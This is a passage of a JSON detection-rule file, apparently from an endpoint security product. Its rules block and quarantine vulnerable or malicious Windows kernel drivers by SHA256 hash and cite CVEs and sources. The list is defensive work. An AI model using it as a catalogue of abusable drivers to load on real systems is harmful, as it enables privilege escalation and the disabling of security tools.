"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978230Z", + "creation_date": "2026-03-23T11:45:29.978232Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978238Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "be03e9541f56ac6ed1e81407dcd7cc85c0ffc538c3c2c2c8a9c747edbcf13100", + "comment": "Vulnerable Kernel Driver (aka t7.sys) [https://www.loldrivers.io/drivers/7196366e-04f0-4aaf-9184-ed0a0d21a75f/] [authentihash 
SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f5f0275a-6857-543f-a784-42f11c8cf995", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617306Z", + "creation_date": "2026-03-23T11:45:29.617308Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617313Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "11a9787831ac4f0657aeb5e7019c23acc39d8833faf28f85bd10d7590ea4cc5f", + "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f5f81cb0-2159-57cd-a250-90417a5af573", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479793Z", + "creation_date": "2026-03-23T11:45:30.479795Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479800Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "54488a8c7da53222f25b6ed74b0dedc55d00f5fa80f4eaf6daac28f7c3528876", + "comment": "Vulnerable Kernel Driver (aka capcom.sys) [https://www.loldrivers.io/drivers/b51c441a-12c7-407d-9517-559cc0030cf6/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f5fb0534-bc4a-5b50-a5fa-e64e112205b5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.481568Z", + "creation_date": "2026-03-23T11:45:30.481570Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.481575Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3670ccd9515d529bb31751fcd613066348057741adeaf0bffd1b9a54eb8baa76", + "comment": "Vulnerable Kernel Driver (aka rtif.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f61acce1-deae-5ee1-a46d-088e0778ae3a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826354Z", + "creation_date": "2026-03-23T11:45:30.826356Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826361Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "aaa308b8f8d30f3b0ed1cfcd50206c96f39a221f011d28825c040a685afa1de3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f6230874-44fe-5505-bacd-c34c4c0638f1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613546Z", + "creation_date": "2026-03-23T11:45:29.613548Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613553Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "e6a2ac52a35d470dc336bae5c48a2ebf2d80519bfd57b703da6ce00ddd12163a", + "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f6275e98-2d79-54d6-88d9-c83f42b79d0a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985233Z", + "creation_date": "2026-03-23T11:45:29.985235Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985241Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "28e09bec08688b00af1e247fa58ee4e55f2b73a06709fe37df7120a2ebee9a9f", + "comment": "Dangerous Physmem Kernel Driver (aka HwRwDrv.Sys) [https://www.loldrivers.io/drivers/e4609b54-cb25-4433-a75a-7a17f43cec00/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f635bd39-1900-58c2-b36d-35a480ee3bf1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.483212Z", + "creation_date": "2026-03-23T11:45:31.483216Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.483226Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2e27a032f1e93ec648cd90136dc3a218bfae19fb5750f17c7a64f95680be44ae", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f65028c4-dea3-590d-be78-3c16ef764c6e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810047Z", + "creation_date": "2026-03-23T11:45:31.810049Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810057Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "eadb4af39567771fec339b58c3c5d1f4aa652443cb3f1915314fafdb6d80de30", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f650d985-4e93-54c2-9fd1-21b9aa5e9723", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616204Z", + "creation_date": "2026-03-23T11:45:29.616206Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616211Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bddf1750dc00725c1384b34740e798b4f5f70218ab71ac62a5a96773b377df5a", + "comment": "Phoenix Tech. 
vulnerable BIOS update tool (aka PhlashNT.sys and WinFlash64.sys) [https://www.loldrivers.io/drivers/be3e49ea-095e-4fdb-9529-f4c2dbb9a9fc/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f656fa1f-65e0-5d26-9892-dd0a78b62b98", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.476900Z", + "creation_date": "2026-03-23T11:45:31.476904Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.476914Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3bb6c306e7f1d806ddf24e07507e4ecb3594f94010da3fc11fa438ffc51b5620", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f659437c-a3ae-5d80-ad9c-4f96f6f7ef12", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:30.468346Z", + "creation_date": "2026-03-23T11:45:30.468349Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.468359Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c9cba07502b8a10034ddf75b35f4d6f2a24862cde5bff300720f5df04d4cfe6b", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f65f32bc-46a9-5624-a812-97985cc42806", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610280Z", + "creation_date": "2026-03-23T11:45:29.610282Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610290Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1ee59eb28688e73d10838c66e0d8e011c8df45b6b43a4ac5d0b75795ca3eb512", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"f66e9787-2669-5c7b-9a98-15ec7ac77b03", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829465Z", + "creation_date": "2026-03-23T11:45:30.829467Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829473Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ad5684e36e6fabe7abdd6dba1a09f8e2dce00634c6e7c8adb71b49bed95ae354", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f6731b03-4a6f-544b-8b97-d740e0bb841f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156362Z", + "creation_date": "2026-03-23T11:45:31.156364Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.156370Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "03dc780cb03df809eb88ba478dd65a48ecbc887963fca4c7bb7325d7677d0bfe", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f68ec9d1-ef90-5d1e-9e35-b0baa19049a7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.454095Z", + "creation_date": "2026-03-23T11:45:30.454099Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.454107Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1284a1462a5270833ec7719f768cdb381e7d0a9c475041f9f3c74fa8eea83590", + "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/bc5e020a-ecff-43c8-b57b-ee17b5f65b21/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f69b839e-1787-523f-8eaa-1eba964966d6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.809729Z", + "creation_date": "2026-03-23T11:45:31.809733Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809741Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9a9ca3709a5e9711846effbabb2b19b74d6827ebf109084335583bd75b7741ca", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f69da92f-08aa-55b1-b9e6-ceeffb2e4235", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.472245Z", + "creation_date": "2026-03-23T11:45:30.472248Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.472257Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "b7aa4c17afdaff1603ef9b5cc8981bed535555f8185b59d5ae13f342f27ca6c5", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f6a23057-5ea4-5c10-a089-6608586baad3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.468953Z", + "creation_date": "2026-03-23T11:45:30.468957Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.468967Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "34d57107b592c4d2c7d1c95eea1ab7400c09d23864c3870ca3656b5ae81859aa", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f6a7b786-1cb2-5abd-b3b3-102a9ea0e606", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.466014Z", + "creation_date": "2026-03-23T11:45:30.466017Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.466026Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dfc80e0d468a2c115a902aa332a97e3d279b1fc3d32083e8cf9a4aadf3f54ad1", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f6ac5bf5-66f3-5b05-bb1e-64a62fbab86f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967475Z", + "creation_date": "2026-03-23T11:45:29.967477Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967483Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bff9b75ae2eea49a765f79d9c67c997edb6c67a2cc720c6187dd2f67980acab7", + "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"f6ad554f-bb77-5ec5-97f2-0ca898257868", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145525Z", + "creation_date": "2026-03-23T11:45:32.145527Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145534Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "95ca14e045618fb38834d17c5cc176162a29d846c1463b840c9129fb9af47c68", + "comment": "Vulnerable Kernel Driver (aka szkg64.sys) [https://www.loldrivers.io/drivers/375e8de3-aae4-488d-8273-66744978b45f/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f6af791f-ac9a-51ec-a7bb-215c31454cfa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605770Z", + "creation_date": "2026-03-23T11:45:29.605772Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605778Z", + 
"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b3a99e3184b73011f565210e169df27545aacf63e10ceb3c5e35602a698877f5", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f6b52d01-97e2-5a5e-bcd3-eefc46cef81e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155787Z", + "creation_date": "2026-03-23T11:45:31.155789Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155795Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "373d50fcb66000374b9b6b0044e3a456ef2d2acfd4748fa55d00fa71be814493", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f6bcb6f6-8875-5727-bbf5-69c98ac0459d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
